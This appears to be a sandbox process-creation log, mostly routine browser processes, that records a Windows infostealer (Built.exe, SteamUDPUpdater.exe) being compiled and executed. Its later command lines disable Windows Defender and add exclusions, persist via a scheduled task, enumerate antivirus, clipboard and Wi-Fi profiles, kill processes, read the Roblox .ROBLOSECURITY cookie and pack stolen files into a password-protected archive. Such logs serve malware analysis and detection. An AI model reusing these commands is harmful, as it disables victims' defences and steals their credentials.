"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4940 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4628,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4968 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4560 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4728 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4660 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4048 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4440 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x2f4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4692 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5400 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5536 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5576 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5728 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5968 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5980 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6280 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6316 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6444 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6452 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6468 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6492 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5572 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7264 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7284 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=7624 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7136 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=7556 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8204 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7152 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8500 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8532 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8956 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9324 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7428 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7576 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6016 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5912 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9764 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9804 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -F pe-i386
C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\windres.exe
C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -F pe-i386
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED resource.rc
C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\gcc.exe
C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED resource.rc
C:\Users\Admin\AppData\Local\Temp\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
"C:/Users/Admin/AppData/Local/Temp/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "resource.rc" "-mtune=generic" "-march=x86-64"
C:\Users\Admin\AppData\Local\Temp\Compilers\tinycc\tcc.exe
"C:\Users\Admin\AppData\Local\Temp\Compilers\tinycc\tcc.exe" -Wall -Wl,-subsystem=windows "C:\Users\Admin\AppData\Local\Temp\loader_fixed.c" resource.o -luser32 -lshell32 -m32
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:2
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -F pe-i386
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -F pe-i386
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED resource.rc
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc.exe
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED resource.rc
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
"C:/Users/Admin/Desktop/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Desktop/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "resource.rc" "-mtune=generic" "-march=x86-64"
C:\Users\Admin\Desktop\Compilers\tinycc\tcc.exe
"C:\Users\Admin\Desktop\Compilers\tinycc\tcc.exe" -Wall -Wl,-subsystem=windows "C:\Users\Admin\Desktop\loader_fixed.c" resource.o -luser32 -lshell32 -m32
C:\Users\Admin\Desktop\loader_fixed.exe
"C:\Users\Admin\Desktop\loader_fixed.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Users\Admin\AppData\Local\Temp\SteamUDPUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\SteamUDPUpdater.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\XenoManager\SteamUDPUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\XenoManager\SteamUDPUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /Create /TN "SteamUDPUpdater" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2CAF.tmp" /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4428"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 748"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4428
C:\Windows\system32\taskkill.exe
taskkill /F /PID 748
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2300"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3776"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2300
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3776
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 532"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3216"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 532
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3216
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3928"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4312"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3928
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4312
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4108"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4108
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1956
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5736"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5736
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3848"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3848
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5312"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5312
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1880"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1880
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5232"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5232
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5492"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5492
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5420"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5420
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5528"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5528
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5412"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5412
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3088"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3088
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5456"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5456
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4564"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4564
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3040"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3040
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6200"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 6200
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6680"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 6680
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6752"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 6752
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6776"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 6776
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7316"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 7316
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7980"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 7980
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 8172"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 8172
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI52802\rar.exe a -r -hp"neekeri" "C:\Users\Admin\AppData\Local\Temp\i5qXG.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI52802\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI52802\rar.exe a -r -hp"neekeri" "C:\Users\Admin\AppData\Local\Temp\i5qXG.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
